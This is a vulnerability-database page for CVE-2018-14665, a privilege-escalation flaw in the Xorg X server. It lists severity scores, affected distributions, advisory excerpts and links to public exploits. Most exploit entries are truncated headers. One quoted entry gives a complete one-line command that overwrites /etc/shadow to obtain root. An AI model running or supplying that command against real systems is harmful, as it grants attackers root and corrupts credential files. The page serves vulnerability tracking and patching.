Published: 25/10/2018 Updated: 22/10/2019

CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9

CVSS v3 Base Score: 6.6 | Impact Score: 5.9 | Exploitability Score: 0.7

VMScore: 742

Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

A flaw was found in xorg-x11-server prior to 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.

Vulnerable Product	Search on Vulmon	Subscribe to Product
x.org xorg-server
redhat enterprise linux server tus 7.6
redhat enterprise linux server aus 7.6
redhat enterprise linux server eus 7.6
redhat enterprise linux server 7.0
redhat enterprise linux workstation 7.0
redhat enterprise linux desktop 7.0
canonical ubuntu linux 18.10
canonical ubuntu linux 18.04
canonical ubuntu linux 16.04
debian debian linux 9.0

Synopsis Important: xorg-x11-server security update Type/Severity Security Advisory: Important Topic An update for xorg-x11-server is now available for Red Hat Enterprise Linux 7Red Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (C ...

XOrg X server could be made to overwrite files as the administrator ...

Narendra Shinde discovered that incorrect command-line parameter validation in the Xorg X server may result in arbitary file overwrite, which can result in privilege escalation For the stable distribution (stretch), this problem has been fixed in version 2:1192-1+deb9u4 We recommend that you upgrade your xorg-server packages For the detailed s ...

An incorrect permission check for -modulepath and -logfile options when starting Xorg X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges ...

Incorrect command-line parameter validation in the Xorg X server can lead to privilege elevation and/or arbitrary files overwrite, when the X server is installed with the setuid bit set and unprivileged users have the ability to log in to the system via physical console The -modulepath argument can be used to specify an insecure path to modules t ...

# Exploit Title: xorg-x11-server 1203 - Privilege Escalation # Date: 2018-10-27 # Exploit Author: Marco Ivaldi # Vendor Homepage: wwwxorg/ # Version: xorg-x11-server 1190 - 1202 # Tested on: OpenBSD 63 and 64 # CVE : CVE-2018-14665 # raptor_xorgasm #!/bin/sh # # raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron # Copyrigh ...

# Exploit Title: xorg-x11-server < 1201 - Local Privilege Escalation (RHEL 7) # Date: 2018-11-07 # Exploit Author: @bolonobolo # Vendor Homepage: wwwxorg/ # Version: 1195 # Tested on: RHEL 73 && 75 # CVE : CVE-2018-14665 # Explanation # The only condition that have to be met for this PE to work via SSH, is that the legiti ...

#CVE-2018-14665 - a LPE exploit via Xorg fits in a tweet cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su Overwrite shadow (or any) file on most Linux, get root privileges *BSD and any other Xorg desktop also affected #!/bin/sh # local privilege escalation in X11 currently # unpatched in OpenBSD 64 stable - ex ...

## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::File include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' ...

xorg-x11-server versions prior to 1201 local privilege escalation exploit ...

xorg-x11-server version 1203 privilege escalation exploit ...

xorg-x11-server versions prior to 1203 modulepath local privilege escalation exploit ...

Xorg X11 server on AIX local privilege escalation exploit ...

xorg-x11-server versions prior to 1203 local privilege escalation exploit ...

Reporting This module requires Metasploit: metasploitcom/download welcome to this page Ethical hacking Khdira class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::Kernel include Msf::Post::Linux::System def init

CVE-2018-14665 Here you can find my analisys and PoC for most used Linux distribution For now i started from Redhat, this is the link for the official RHSA RHSA-2018:3410

OpenBsd_CVE-2018-14665

CVE-2018-14665 0x00 简介印度安全研究员Narendra Shinde在XOrg Server软件包中发现了一个普通账号提权root的高危漏洞（CVE-2018-14665），它影响了主要的Linux发行版，包括OpenBSD，Debian，Ubuntu，CentOS，Red Hat和Fedora。 Xorg X项目提供了X Window系统的开源实现（也就是X11，或简称X，它是位图显示的窗口系统

Next-Generation Linux Kernel Exploit Suggester

Linux Exploit Suggester 2 Next-generation exploit suggester based on Linux_Exploit_Suggester Key Improvements Include: More exploits! Option to download exploit code directly from Exploit DB Accurate wildcard matching This expands the scope of searchable exploits Output colorization for easy viewing And more to come! This script is extremely useful for quickly finding priv

A collection of weaponized LPE exploits written in Go

Go-LPE A collection of LPE exploits written in Go Exploits CVE Description Link 2021-4034 pkexec exploit rewritten in pure Go that is based on blasty's poc haxxin/files/blasty-vs-pkexecc 2018-14665 xorg (a demo) that works in environments with certain xorg versions wwwcvedetailscom/cve/CVE-2018-14665 Get Started go get -u -v githubcom/jm33

CVE-2018-14665

Vulnerability Summary

Vulnerability Trend

Vendor Advisories

Exploits

Github Repositories

References

Vulmon Search

About

Products

Connect